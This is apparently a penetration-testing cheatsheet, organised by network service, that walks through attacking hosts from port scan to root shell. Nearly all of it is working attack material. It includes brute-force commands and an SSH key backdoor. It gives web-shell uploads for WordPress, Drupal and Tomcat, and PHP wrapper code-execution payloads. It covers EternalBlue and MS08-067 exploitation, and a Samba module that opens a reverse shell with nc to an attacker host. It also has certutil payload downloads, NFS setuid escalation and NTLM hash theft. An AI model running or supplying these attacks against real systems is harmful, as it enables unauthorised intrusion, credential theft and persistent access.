The methodology described here was borrowed from liodeus, with a few adaptations.
Original author: liodeus
Contents
Enumeration
NMAP
TCP
```bash
# SYN scan with default scripts and version detection; -oA writes .nmap/.gnmap/.xml files.
# The default covers the top 1000 ports, add -p- to scan all 65535.
sudo nmap -sS -sC -sV -oA <NAME>.tcp <IP> -v
```
UDP
```bash
# UDP scans are slow; -sU -sS runs UDP and TCP SYN in one pass, --top-ports 100 keeps UDP manageable.
sudo nmap -sU -sS -sC -sV -oA <NAME>.udp <IP> -v
```
FTP - 21
Brute force
```bash
# -L/-P user and password lists, -f stop after the first valid pair, -u loop over users before passwords
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ftp://<IP> -u -vV
```
Downloading file
```bash
ftp <IP>
# log in (try anonymous / anonymous when no credentials are known)
passive
binary
get <FILE>
```
Uploading file
```bash
ftp <IP>
passive
binary
put <FILE>
```
SSH - 22
Brute force
```bash
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ssh://<IP> -u -vV
```
CVE-2008-0166
All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc.) between September 2006 and May 13th, 2008 may be affected: the patched OpenSSL PRNG was seeded only with the process ID, so there are at most 32,768 possible keys per key type, size and architecture, and the whole set can be precomputed and tried against the server.
https://www.exploit-db.com/exploits/5720
```bash
# Fetch the precomputed weak key sets (RSA 2048 and DSA 1024, x86)
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2 https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
bunzip2 debian_ssh_rsa_2048_x86.tar.bz2 debian_ssh_dsa_1024_x86.tar.bz2
tar -xvf debian_ssh_rsa_2048_x86.tar
tar -xvf debian_ssh_dsa_1024_x86.tar
# Try every key of the set against one user (exploit-db 5720 is a Python script)
python 5720.py rsa/2048 <IP> <USER> <PORT> <THREADS>
python 5720.py dsa/1024 <IP> <USER> <PORT> <THREADS>
```
SSH backdoor - post exploitation
```bash
# Attacker: generate a key pair (ssh-keygen already sets mode 600 on the private key)
ssh-keygen -f <FILENAME>
cat <FILENAME>.pub   # copy the single line of output
# Victim: append the public key content (not the file name) to authorized_keys
mkdir -p <PATH>/.ssh && chmod 700 <PATH>/.ssh
echo '<CONTENT_OF_FILENAME.pub>' >> <PATH>/.ssh/authorized_keys
chmod 600 <PATH>/.ssh/authorized_keys
# Connect
ssh -i <FILENAME> <USER>@<IP>
```
DNS - 53
Zone transfer
```bash
dnsrecon -d <DOMAIN> -a
dig axfr <DOMAIN> @<NAMESERVER>
```
DNS brute force
https://github.com/blark/aiodnsbrute
FINGER - 79
User enumeration
```bash
finger @<IP>
finger <USER>@<IP>
```
Command execution
```bash
# Old fingerd implementations hand the query to a shell, so a leading pipe runs a command
finger "|/bin/id@<IP>"
finger "|/bin/ls -a /@<IP>"
```
HTTP - HTTPS - 80 - 443
Automatic scanners
```bash
nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20
```
Wordpress
```bash
# Scan (--rua random user agent, -e enumerate users, plugins and themes)
wpscan --rua -e --url <URL>
# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"
```
Wordpress panel RCE
Modify a PHP file of the active theme (admin credentials needed):
Appearance -> Theme Editor -> 404 Template (on the right)
Replace its content with a PHP shell, e.g. https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Then request the file directly; the path depends on the theme name:
http://<IP>/wp-content/themes/twentytwelve/404.php
Drupal
```bash
droopescan scan -u <URL>
```
Username enumeration
At /user/register try to create an account; if the name is taken the form says so:
*The name admin is already taken*
Requesting a new password for an existing username:
*Unable to send e-mail. Contact the site administrator if the problem persists.*
Requesting a new password for a non-existent username:
*Sorry, test is not recognized as a user name or an e-mail address.*
Requesting /user/<number> reveals how many users exist:
- /user/1 -> Access denied (user exists)
- /user/2 -> Page not found (user doesn't exist)
Hidden pages enumeration
Fuzz /node/<NUMBER> where <NUMBER> is a number (1 to 500 for example).
You may find hidden pages (test, dev) that are not referenced by search engines.
```bash
wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ
```
Drupal panel RCE
The PHP Filter module must be present (request /modules/php: a 403 means it exists, a 404 means it isn't installed) and you need admin access.
Go to Modules -> (check) PHP Filter -> Save configuration
Shell: https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Then Add content -> Basic page or Article -> paste the PHP shell in the body -> select "PHP code" as Text format -> Preview (the code already runs on preview, nothing needs to be saved).
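The enumeration logic above as an added example (not from the original cheatsheet and not Drupal's code): it walks /user/<n> using the 403/404 difference and classifies the password-reset and registration responses by the messages quoted above. The HTTP layer is injected as a `fetch(method, path, data)` callable so the logic runs offline; the constructed `fake_site` stands in for a Drupal 7 target with users 1, 2 and 4. A real fetch would also have to send the form's hidden fields (form_id, form_build_id), which this example assumes the caller handles.

```python
import re
from typing import Callable, Dict, List, Tuple

# Response fragments quoted in the cheatsheet (Drupal 7 wording).
MSG_TAKEN = "is already taken"
MSG_RESET_EXISTS = "Unable to send e-mail"
MSG_RESET_MISSING = "is not recognized as a user name or an e-mail address"

# fetch(method, path, form_data) -> (status_code, body)
Fetch = Callable[[str, str, Dict[str, str]], Tuple[int, str]]


def user_exists_by_id(fetch: Fetch, uid: int) -> bool:
    """/user/<uid>: 403 (Access denied) means the account exists, 404 means it does not."""
    status, _ = fetch("GET", f"/user/{uid}", {})
    return status == 403


def enumerate_uids(fetch: Fetch, max_uid: int = 50, max_gap: int = 5) -> List[int]:
    """Walk uids upward; deleted accounts leave holes, so stop only after max_gap misses in a row."""
    found, gap = [], 0
    for uid in range(1, max_uid + 1):
        if user_exists_by_id(fetch, uid):
            found.append(uid)
            gap = 0
        else:
            gap += 1
            if gap >= max_gap:
                break
    return found


def username_exists(fetch: Fetch, name: str) -> bool:
    """Password-reset message first (cheap, creates nothing); fall back to the registration form."""
    _, body = fetch("POST", "/user/password", {"name": name})
    if MSG_RESET_EXISTS in body:
        return True
    if MSG_RESET_MISSING in body:
        return False
    _, body = fetch("POST", "/user/register", {"name": name, "mail": f"{name}@example.invalid"})
    return MSG_TAKEN in body


def enumerate_usernames(fetch: Fetch, candidates: List[str]) -> List[str]:
    return [n for n in candidates if username_exists(fetch, n)]


# --- constructed stand-in for a Drupal 7 site: uids 1, 2 and 4 exist, uid 3 was deleted ---
FAKE_USERS = {1: "admin", 2: "editor", 4: "dev"}


def fake_site(method: str, path: str, data: Dict[str, str]) -> Tuple[int, str]:
    m = re.fullmatch(r"/user/(\d+)", path)
    if method == "GET" and m:
        return (403, "Access denied") if int(m.group(1)) in FAKE_USERS else (404, "Page not found")
    if method == "POST" and path == "/user/password":
        if data.get("name") in FAKE_USERS.values():
            return 200, "Unable to send e-mail. Contact the site administrator if the problem persists."
        return 200, f"Sorry, {data.get('name')} is not recognized as a user name or an e-mail address."
    if method == "POST" and path == "/user/register":
        if data.get("name") in FAKE_USERS.values():
            return 200, f"The name {data['name']} is already taken"
        return 200, "Registration form"
    return 404, "Page not found"


if __name__ == "__main__":
    print("uids:", enumerate_uids(fake_site))
    print("users:", enumerate_usernames(fake_site, ["admin", "test", "dev"]))
```

The gap tolerance matters on real sites: uid 1 is always the first admin, but accounts deleted later leave 404 holes, so stopping at the first miss undercounts.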
Joomla
```bash
joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v
```
Tomcat
Default credentials
The most interesting path of Tomcat is /manager/html: from there you can upload and deploy WAR files, i.e. execute code. The path is protected by HTTP basic auth; the most common credentials are:
```text
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
```
Brute force
```bash
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u
```
Tomcat panel RCE
```bash
# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
# Upload payload
# Tomcat 6:
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
# Tomcat 7 and above (the account needs the manager-script role for the /text interface):
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shell&update=true'
# Listener
nc -lvnp <PORT>
# Execute payload
curl http://<IP>:8080/shell/
```
WebDav
HTTP brute force authentication
HTTP basic authentication
```bash
# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15
# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307
```
HTTP GET request
```bash
# F= is the string marking a failed login, H= adds a header (here a session cookie)
hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>
```
HTTP POST request
```bash
hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>
```
Spidering / Brute force directories / files
```bash
gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster
```
Dictionaries:
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
File backups
Once you have found all the files, look for backups of the executable ones (".php", ".aspx", ...), which the server returns as plain text. Common naming variations for a backup are:
```text
file.ext~, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old
```
Local File Inclusion / Remote File Inclusion - LFI / RFI
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
Wrappers
Wrapper php://filter
Returns the source of a PHP file instead of executing it (base64-encoded so that it survives being embedded in the HTML):
```text
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=<FILE>
```
Wrapper expect://
Runs a command directly, but requires the expect extension, which is rarely installed:
```text
http://example.com/index.php?page=expect://id
```
Wrapper data://
Requires allow_url_include=On (off by default since PHP 5.2); the same applies to php://input below.
```bash
echo '<?php phpinfo(); ?>' | base64 -w0
# PD9waHAgcGhwaW5mbygpOyA/Pgo=
```
```text
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=
```
If there is code execution you should see the phpinfo() page: look at disable_functions and craft a payload with functions that aren't disabled.
Code execution with:
- exec
- shell_exec
- system
- passthru
- popen
```bash
# Example
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0
# PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
```
```text
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
```
If "Shell done !" appears on the page there is code execution, and commands can be passed through the cmd parameter:
```text
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls
```
Wrapper php://input
```bash
curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"
```
Useful LFI list
```bash
# Linux
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
# Windows
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
# Both
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
```
```bash
# Automated LFI tools
kadimus --url <URL>
python lfisuite.py
```
Command injection
For command injection, work through Burp Suite so you can see the raw request and response.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Deserialization
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserialization
File upload
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
SQL injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqli
XSS
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
```bash
# BeEF: start the framework and read its default credentials from the config
beef-xss
grep user -C 1 /usr/share/beef-xss/config.yaml   # user / password
```
Hook a victim's browser by injecting:
```html
<script src="http://<IP>:3000/hook.js"></script>
```
Other web vulnerabilities
https://github.com/swisskyrepo/PayloadsAllTheThings
Upload a file with PUT
```bash
# --data-binary keeps the file intact; -d would strip carriage returns and newlines
curl -X PUT http://<IP>/<FILE> --data-binary @<FILE> -v
```
KERBEROS - 88
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
POP3 - 110
Brute force
```bash
hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V
# -S: POP3 over TLS on 995
hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V
```
Read mail
```bash
telnet <IP> 110
USER <USER>
PASS <PASSWORD>
LIST
RETR <MAIL_NUMBER>
QUIT
```
SNMP - 161
```bash
# Brute force the community string
onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt <IP>
# Walk the whole tree with a known community string (snmpbulkwalk needs v2c; use snmpwalk -v1 for v1-only agents)
snmpbulkwalk -c <COMMUNITY_STRING> -v<VERSION> <IP>
```
Modifying SNMP values
A community string with write access lets you change values with snmpset:
http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html
LDAP - 389
Scans
```bash
nmap -n -sV -p 389 --script "ldap* and not brute" <IP>
# Anonymous bind, read the root DSE (namingContexts gives the base DN to use with -b)
ldapsearch -h <IP> -x -s base
# Authenticated bind (-h is deprecated on recent OpenLDAP, use -H ldap://<IP> instead)
ldapsearch -h <IP> -x -D '<DOMAIN>\<USER>' -w '<PASSWORD>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
```
Graphical Interface
SMB - 445
Version if nmap didn't detect it
Sometimes nmap doesn't show the Samba version of the remote host. A good way to find it is to capture traffic on 445/139 with Wireshark while running smbclient -L against the host, then follow the TCP stream: the server's version string appears in the session setup. The same can be done from the command line with ngrep in a second terminal:
```bash
sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L <IP>
```
Scan for vulnerability
```bash
nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP>
```
If the scan reports one of the following, jump to the matching section below:
- MS17-010 - EternalBlue
- MS08-067
- CVE-2017-7494 (SambaCry)
Manual testing
```bash
smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R
crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares
enum4linux -a <IP>
smbclient --no-pass -L //<IP>
smbclient //<IP>/<SHARE>
# Download all files from a share recursively
smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"
```
Brute force
```bash
# Check the lockout policy first when spraying domain accounts
crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV
```
Mount a SMB share
```bash
mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>' //<IP>/<SHARE> /tmp/share
smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>
```
Get a shell
```bash
# Impacket: password or pass-the-hash (-hashes LMHASH:NTHASH, the LM part may be left empty)
psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>
atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH> <COMMAND>
```
EternalBlue
https://github.com/3ndG4me/AutoBlue-MS17-010
Check if vulnerable
```bash
python eternal_checker.py <IP>
```
Prepare shellcodes and listeners
```bash
cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh
```
Exploit
```bash
# <NUMBER> selects the target family (7 for Windows 7 / 2008 R2, 8 for Windows 8 / 2012, 10 for Windows 10)
python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin
# May need to be run multiple times
```
If this doesn't work, try this one (it needs an SMB login, a guest or null session is often enough):
```bash
python zzz_exploit.py <IP>
```
MS08-067
```bash
# Download exploit code
git clone https://github.com/andyacer/ms08_067.git
# Generate payload (-b lists the bytes the RPC string must not contain)
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# Modify
# Edit ms08_067_2018.py and replace the shellcode variable with the buffer generated by msfvenom.
# Listener
nc -lvnp <PORT>
# Exploit (<NUMBER> is the target OS/service pack ID; run the script without arguments to list them)
python ms08_067_2018.py <IP> <NUMBER> 445
```
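A check worth running before pasting the buffer into ms08_067_2018.py, as an added example (not from the cheatsheet or the exploit): it parses msfvenom's `-f c` output, confirms none of the bytes passed to -b survived the encoder, and re-emits the buffer in the escaped-string form the Python exploit expects. The sample buffer below is constructed to look like msfvenom output and is not real shellcode.

```python
import re
from typing import List, Tuple

# The bad-character list passed to msfvenom -b above.
BADCHARS = bytes.fromhex("000a0d5c5f2f2e40")   # \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40

# Constructed stand-in for `msfvenom ... -f c` output (real output is a few hundred bytes).
SAMPLE_C = r'''
unsigned char buf[] =
"\xba\x1f\x90\x0e\x44\xdb\xcf\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52"
"\x31\x53\x12\x83\xc3\x04\x03\x2c\xf6\x71\x5d\x2d\x1e\xf7";
'''


def parse_c_buffer(text: str) -> bytes:
    """Collect every \\xNN escape from the C string literals, in order."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_badchars(blob: bytes, bad: bytes = BADCHARS) -> List[Tuple[int, int]]:
    """[(offset, byte), ...] for every forbidden byte; an empty list means the buffer is safe to use."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def to_python_literal(blob: bytes) -> str:
    """Escaped form for the shellcode variable in ms08_067_2018.py."""
    return "".join(f"\\x{b:02x}" for b in blob)


if __name__ == "__main__":
    buf = parse_c_buffer(SAMPLE_C)
    hits = find_badchars(buf)
    print(f"{len(buf)} bytes, bad chars at: {hits or 'none'}")
    print(to_python_literal(buf))
```

If the check reports hits, regenerate with a different encoder (`-e x86/shikata_ga_nai` and more iterations with `-i`) rather than hand-editing the buffer.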
CVE-2017-7494
```bash
# Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494
```
Create a new file named poc.c (Samba loads the shared object and calls samba_init_module):
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int samba_init_module(void)
{
    setresuid(0, 0, 0);
    system("ping -c 3 <IP>");
    return 0;
}
```
```bash
# Build
gcc -o test.so -shared poc.c -fPIC
```
```bash
# Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp
# Exploit (needs a writable share: the module is uploaded there, then loaded through a named pipe)
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
```
If you receive 3 pings on your listener the exploit works. Now get a shell:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int samba_init_module(void)
{
    setresuid(0, 0, 0);
    system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
    return 0;
}
```
```bash
# Build
gcc -o test.so -shared poc.c -fPIC
```
```bash
# Start a listener
nc -lvnp <PORT>
# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
```
MSSQL - 1433
```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
```
Brute force
```bash
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u
```
Having credentials
```bash
# Impacket
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>
```
Once logged in you can run queries:
```sql
SQL> select @@version;
```
Steal the Net-NTLM hash of the SQL Server service account: start an SMB server on the attacker, then make the server connect to it:
```bash
sudo smbserver.py -smb2support liodeus .
```
```sql
SQL> exec master..xp_dirtree '\\<IP>\liodeus\'   -- crack the captured hash with john or hashcat, or relay it
-- Try to enable code execution (needs sysadmin; mssqlclient.py shortcut for sp_configure)
SQL> enable_xp_cmdshell
-- Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe
```
Manual exploit
Cheatsheet:
- https://www.asafety.fr/mssql-injection-cheat-sheet/
NFS - 2049
Show Mountable NFS Shares
```bash
showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>
```
Mount a share
```bash
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
# Old servers may only speak NFSv2
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>
```
NFS misconfigurations
```bash
# List exported shares (on the server)
cat /etc/exports
```
If a directory is exported with no_root_squash/no_all_squash you may be able to escalate privileges: root on the client stays root on the server, so a setuid binary created through the share is root-owned on the victim.
```bash
# Attacker, as root
mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
cat > pwn.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void){ setreuid(0, 0); system("/bin/bash"); return 0; }
EOF
gcc pwn.c -o pwn   # build for the victim's architecture/libc (-m32 or -static if needed)
chmod +s pwn
# Victim
cd <SHARE>
./pwn   # root shell
```
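The /etc/exports review above, as an added example (not from the original cheatsheet): a parser for the exports syntax that flags every client spec exported read-write with no_root_squash, which is exactly the condition the setuid trick needs. It also handles the classic mistake of a space between the client and its options (`host (rw)`), which exportfs interprets as read-only for that host and read-write for the whole world. The sample file is constructed.

```python
import re
from typing import List, Set, Tuple

# Constructed /etc/exports; the last line shows the space-before-options mistake.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/srv/share      10.10.0.0/24(rw,sync,no_root_squash) *(ro)
/home/backup    *(rw,no_subtree_check,no_all_squash)
/var/www        192.168.1.5(rw,sync)
/srv/public     *(rw,insecure,no_root_squash,no_subtree_check)
/opt/data       10.10.0.7 (rw,no_root_squash)
"""

Entry = Tuple[str, str, Set[str]]   # (export path, client spec, option set)


def parse_exports(text: str) -> List[Entry]:
    """One entry per client spec; a bare '(opts)' token applies to every client ('*')."""
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            host = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, host, opts))
    return entries


def risky_exports(text: str) -> List[Tuple[str, str]]:
    """Exports where a client's root keeps uid 0 on the server: rw plus no_root_squash (root_squash is the default)."""
    return [(path, host) for path, host, opts in parse_exports(text)
            if "rw" in opts and "no_root_squash" in opts]


if __name__ == "__main__":
    for path, host in risky_exports(SAMPLE_EXPORTS):
        print(f"{path} exported rw with no_root_squash to {host}")
```

no_all_squash on its own (the /home/backup line) is not flagged: it only stops non-root uids from being mapped to nobody, root is still squashed. An `insecure` option additionally allows requests from unprivileged source ports, which matters when you mount from a host where you are not root.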
MYSQL - 3306
Brute force
```bash
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u
```
Credentials on a compromised host
```bash
# Debian maintenance account (root-equivalent on older installs)
cat /etc/mysql/debian.cnf
# Usernames and hashes straight from the raw user table
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
Connect
```bash
# Local
mysql -u <USER>
mysql -u <USER> -p
# Remote
mysql -h <IP> -u <USER>
```
MySQL commands
```sql
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
select * from <TABLE>;
-- Try to execute code (do_system is a UDF that must already be loaded; \! only works in the local client)
select do_system('id');
\! sh
-- Read & Write (needs the FILE privilege, and secure_file_priv must allow the path)
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>';
```
Manual exploit
Cheatsheet:
- https://www.asafety.fr/mysql-injection-cheat-sheet/
RDP - 3389
Brute force
```bash
crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>
hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV
```
Connect with known credentials / hash
```bash
rdesktop -u <USERNAME> <IP>
rdesktop -d <DOMAIN> -u <USERNAME> -p <PASSWORD> <IP>
xfreerdp /u:[DOMAIN\]<USERNAME> /p:<PASSWORD> /v:<IP>
# Pass-the-hash over RDP only works when Restricted Admin mode is enabled on the target
xfreerdp /u:[DOMAIN\]<USERNAME> /pth:<HASH> /v:<IP>
```
Session stealing
List the open sessions with `query user` to get the ID and session name, then attach to the selected one (tscon needs SYSTEM, e.g. run it from a service or with PsExec -s):
```cmd
tscon <ID> /dest:<SESSIONNAME>
```
Adding user to RDP group (Windows)
```cmd
net localgroup "Remote Desktop Users" <USER> /add
```
VNC - 5800 - 5801 - 5900 - 5901
Scans
```bash
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p <PORT> <IP>
```
Brute force
```bash
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV
```
Connect
```bash
vncviewer <IP>:<PORT>
```
Found VNC password
Linux
The password is stored (DES-obfuscated, see below) in ~/.vnc/passwd
Windows
```text
# RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
# TigerVNC
HKEY_LOCAL_MACHINE\Software\TigerVNC\WinVNC4
# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
```
Decrypt VNC password
VNC "encrypts" the stored password with DES under a fixed, publicly known key, so it can be recovered directly:
```ruby
msfconsole
irb
fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["2151D3722874AD0C"].pack('H*'), fixedkey
```
WINRM - 5985 - 5986
Brute force
```bash
crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
```
Connecting
```bash
evil-winrm -i <IP> -u <USER> -p <PASSWORD>
evil-winrm -i <IP> -u <USER> -H <HASH>
```
CGI
Find CGI scripts
```bash
ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGI-XPlatform.fuzz.txt -u <URL>/cgi-bin/FUZZ -t 50
ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGIs.txt -u <URL>/cgi-bin/FUZZ -t 50
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/cgi-bin/FUZZ -e .sh,.pl,.cgi -t 100
```
If a script is found, try Shellshock (CVE-2014-6271): send a request header such as User-Agent whose value starts with `() { :; };` followed by a command; it works when the CGI is a bash script or spawns bash.
Command and control framework
```bash
# Download (tag v1.2)
git clone -b v1.2 https://github.com/mhaskar/Octopus
# Install requirements
pip install -r requirements.txt
# Usage
./octopus.py
# Listener (example)
listen_http <BIND_IP> <BIND_PORT> <HOSTNAME> <INTERVAL_IN_SECONDS> <URL> <LISTENER_NAME>
listen_http 0.0.0.0 80 192.168.1.87 5 test.php listener_1
# Agent (example)
generate_powershell <LISTENER_NAME>
generate_powershell listener_1
```
Compiling exploits
For linux
```bash
# 64 bits
gcc -o exploit exploit.c
# 32 bits (needs gcc-multilib)
gcc -m32 -o exploit exploit.c
```
For windows
```bash
# Win32 executable
i686-w64-mingw32-gcc -o <FILE>.exe <FILE>.c
# Win64 executable
x86_64-w64-mingw32-gcc -o <FILE>.exe <FILE>.c
# .cpp source file
i586-mingw32msvc-g++ -o <FILE>.exe <FILE>.cpp
